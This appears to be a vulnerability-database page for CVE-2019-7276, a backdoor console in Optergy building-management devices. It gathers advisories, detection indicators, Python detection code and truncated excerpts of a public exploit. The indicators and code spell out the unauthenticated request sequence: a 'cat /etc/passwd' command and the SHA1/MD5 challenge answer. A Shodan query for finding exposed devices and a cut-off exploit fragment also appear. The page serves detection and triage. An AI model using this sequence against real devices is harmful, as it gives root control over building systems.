CVE-2019-7276
Published: 2019-07-01
CVE-2019-7276: Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console.
Priority: P1 (92) · Severity: critical 9.8 (CVSS 3.0)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 93.38% (99.8th percentile)
Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| optergy | enterprise | <= 2.3.0a | — |
| optergy | proton | <= 2.3.0a | — |
Detection & IOCs (extracted from sources)
- Command IoC (POST body): `command=cat /etc/passwd&challenge={{challenge}}&answer={{ sha1(challenge) + md5(sha1(challenge)) }}`
- Detect unauthenticated GET requests to the backdoor challenge endpoint /tools/ajax/ConsoleResult.html?get, followed by a POST to the same path with 'command', 'challenge', and 'answer' parameters.
- The exploit answer parameter is computed as SHA1(challenge) concatenated with MD5(SHA1(challenge)). Detecting this specific two-step hash pattern in POST body parameters can identify exploitation attempts.
- Alert on HTTP requests containing the User-Agent string 'BB/BMS-251.4ev4h', which is hardcoded in the public exploit PoC.
- Monitor for HTTP responses with Content-Type application/json and body matching regex 'root:.*:0:0:' as an indicator of successful exploitation via the backdoor console.
- Shodan query 'html:"Optergy"' can be used to identify internet-exposed Optergy BMS devices potentially vulnerable to this CVE.
- Successful exploitation results in root command execution using sudo as user 'optergy'. Monitor for sudo usage by the 'optergy' OS user as a post-exploitation indicator.
- The vulnerability affects Optergy Proton and Enterprise BMS versions 2.0.3a and below. Version 2.3.0a is also explicitly referenced in the public exploit. Ensure version scoping is applied when triaging alerts.
- The backdoor console endpoint is undocumented and unauthenticated — no credentials are required to reach it, meaning perimeter authentication controls alone are insufficient to block exploitation.
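The indicators above can be turned into a small triage routine. The following is an added example written for this page; it is not code from any of the cited sources. It assumes a hypothetical normalised proxy/WAF log where each record carries the source IP, method, URL, User-Agent, request body, response Content-Type and response body (field names `src`, `method`, `url`, `ua`, `body`, `resp_ctype`, `resp_body` are this example's own). The sample traffic at the bottom is constructed: one source replays the documented GET-then-POST sequence against the console endpoint, the other is benign. Only the path, User-Agent, parameter names, hash pattern and response regex come from the IoC list.

```python
import hashlib
import re
from urllib.parse import parse_qs, urlsplit

# Constants taken from the indicator list on this page.
BACKDOOR_PATH = "/tools/ajax/ConsoleResult.html"
POC_USER_AGENT = "BB/BMS-251.4ev4h"
PASSWD_ROOT_RE = re.compile(r"root:.*:0:0:")


def expected_answer(challenge: str) -> str:
    """The two-step hash pattern from the IoC list: hex SHA1(challenge)
    followed by hex MD5 of that SHA1 hex string."""
    h1 = hashlib.sha1(challenge.encode()).hexdigest()
    h2 = hashlib.md5(h1.encode()).hexdigest()
    return h1 + h2


def analyze(events):
    """Walk request/response records in order and collect indicators per source.

    `events` is a list of dicts in the hypothetical log format described in the
    lead-in. Returns {src: set(indicator_names)}; sources with no indicators are
    omitted so the caller can iterate only over what needs triage.
    """
    findings = {}
    challenge_fetched = set()  # sources that already pulled a challenge via GET

    def flag(src, name):
        findings.setdefault(src, set()).add(name)

    for ev in events:
        src = ev["src"]
        parts = urlsplit(ev["url"])
        on_backdoor = parts.path == BACKDOOR_PATH

        # Hard-coded User-Agent of the public PoC.
        if ev.get("ua") == POC_USER_AGENT:
            flag(src, "poc-user-agent")

        # Step 1 of the exploit: unauthenticated GET ...ConsoleResult.html?get
        if on_backdoor and ev["method"] == "GET" and "get" in parts.query.split("&"):
            challenge_fetched.add(src)
            flag(src, "challenge-request")

        # Step 2: POST to the same path with command/challenge/answer.
        if on_backdoor and ev["method"] == "POST":
            params = parse_qs(ev.get("body", ""))
            if {"command", "challenge", "answer"} <= set(params):
                flag(src, "console-command")
                if src in challenge_fetched:
                    flag(src, "get-then-post-sequence")
                # Confirm the answer follows the documented SHA1 || MD5(SHA1) pattern.
                if params["answer"][0].lower() == expected_answer(params["challenge"][0]):
                    flag(src, "challenge-answer-match")

        # Successful command output leaking /etc/passwd content in a JSON response.
        ctype = ev.get("resp_ctype", "")
        if ctype.startswith("application/json") and PASSWD_ROOT_RE.search(ev.get("resp_body", "")):
            flag(src, "passwd-root-in-response")

    return findings


def verdict(indicators):
    """Roll a source's indicator set up into a triage label."""
    if "passwd-root-in-response" in indicators and "console-command" in indicators:
        return "likely-successful-exploitation"
    if "console-command" in indicators or "challenge-answer-match" in indicators:
        return "exploitation-attempt"
    if indicators:
        return "suspicious"
    return "none"


# Constructed sample traffic (not captured from a real device).
_CHALLENGE = "4f1a9c"  # constructed challenge value
SAMPLE_EVENTS = [
    {"src": "203.0.113.5", "method": "GET", "url": BACKDOOR_PATH + "?get",
     "ua": POC_USER_AGENT, "body": "", "resp_ctype": "application/json",
     "resp_body": '{"response":{"message":"%s"}}' % _CHALLENGE},
    {"src": "203.0.113.5", "method": "POST", "url": BACKDOOR_PATH,
     "ua": POC_USER_AGENT,
     "body": "command=cat /etc/passwd&challenge=%s&answer=%s"
             % (_CHALLENGE, expected_answer(_CHALLENGE)),
     "resp_ctype": "application/json",
     "resp_body": '{"response":{"message":"root:x:0:0:root:/root:/bin/bash"}}'},
    {"src": "198.51.100.7", "method": "GET", "url": "/login.html",
     "ua": "Mozilla/5.0", "body": "", "resp_ctype": "text/html",
     "resp_body": "<html><title>Login</title></html>"},
]


def run_sample():
    """Analyze the constructed sample and return the per-source indicator sets."""
    return analyze(SAMPLE_EVENTS)


if __name__ == "__main__":
    for src, ind in run_sample().items():
        print(src, verdict(ind), sorted(ind))
```

The ordering matters: the GET-then-POST sequence indicator is only raised when the challenge fetch was seen before the POST from the same source, so feed records in timestamp order. Matching the answer against the documented hash pattern separates the public PoC from unrelated scanners hitting the same path, while the response regex is what distinguishes a blocked attempt from a successful one.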
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | | 9.8 | CRITICAL | |
GHSA
GHSA-3hvf-c8rp-98pv: Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console
ghsa_unreviewed·2022-05-24
Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console.
VulnCheck
Optergy Proton/Enterprise Remote Root Code Execution
vulncheck·2019·CVSS 9.8
Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console.
Affected: optergy enterprise
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/; https://app.crowdsec.net/cti/cve-explorer/CVE-2019-7276
CISA ICS
Optergy Proton Enterprise Building Management System
cisa_ics·2019-06-06·CVSS 5.3
ICS Advisory
Last Revised: June 06, 2019
Alert Code: ICSA-19-157-01
## 1. EXECUTIVE SUMMARY
- CVSS v3 10.0
- ATTENTION: Exploitable remotely/low skill level to exploit
- Vendor: Optergy
- Equipment: Proton/Enterprise Building Management System
- Vulnerabilities: Information Exposure, Cross-site Request Forgery, Unrestricted Upload of File with Dangerous Type, Open Redirect, Hidden Functionality, Exposed Dangerous Method or Function, Use of Hard-coded Credentials
## 2. RISK EVALUATION
Successful exploitation of these vulnerabilities could
No detection rules found.
Exploit-DB
Optergy 2.3.0a - Remote Code Execution (Backdoor)
exploitdb·2019-11-12·CVSS 9.8
---
```python
# Title: Optergy 2.3.0a - Remote Code Execution
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: \n'
sys.exit()
while True:
challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get'
try:
req1 = requests.get(challenge_url)
get_challenge = json.loads(req1.text)
challenge = get_challenge['response']['message']
print 'Challenge received: ' + challenge
hash_object = hashlib.sha1(challenge.encode())
print 'SHA1: '+(hash_object.hexdigest())
h1 = (hash_object.hexdigest())
hash_object = hashlib.md5(h1.encode())
print 'MD5 from SHA1: '+(hash_object.hexdigest())
h2 = (hash_object.hexdigest())
print 'Answer: '+h1+h2
zeTargets = 'http:
```
Nuclei
Optergy Proton/Enterprise - Unauthenticated RCE via Backdoor Console
nuclei·CVSS 9.8
Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console.
Template:
```yaml
id: CVE-2019-7276

info:
  name: Optergy Proton/Enterprise - Unauthenticated RCE via Backdoor Console
  author: daffainfo
  severity: critical
  description: |
    Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console.
  impact: |
    Unauthenticated attackers can exploit the backdoor console to execute arbitrary system commands with root privileges, leading to complete device compromise and control over building management systems.
  remediation: |
    Apply vendor-provided firmware updates or disable the affected console feature if possible.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7276
    - htt
```
Metasploit
Optergy Proton and Enterprise BMS Command Injection using a backdoor
metasploit
This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise Building Management System (BMS) applications. Versions `2.0.3a` and below are vulnerable. Attackers can exploit this issue by directly navigating to an undocumented backdoor script called Console.jsp in the tools directory and gain full system access. Successful exploitation results in `root` command execution using `sudo` as user `optergy`.
Unit42
Two New IoT Vulnerabilities Identified with Mirai Payloads
blogs_unit42·2020-10-14
Two New IoT Vulnerabilities Identified with Mirai Payloads
## Two New IoT Vulnerabilities Identified with Mirai Payloads
Ken Hsu
Yue Guan
Vaibhav Singhal
Qi Deng
Published: October 14, 2020
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While this generic approach allows researchers to observe the entire killchain and even acquire the malware binary from the attack, this post-exploitation heuristic does have its caveat: the traffic fingerprinting. Similar services yield similar traffi
References
- http://packetstormsecurity.com/files/171564/Optergy-Proton-And-Enterprise-BMS-2.0.3a-Command-Injection.html
- http://www.securityfocus.com/bid/108686
- https://applied-risk.com/labs/advisories
- https://www.applied-risk.com/resources/ar-2019-008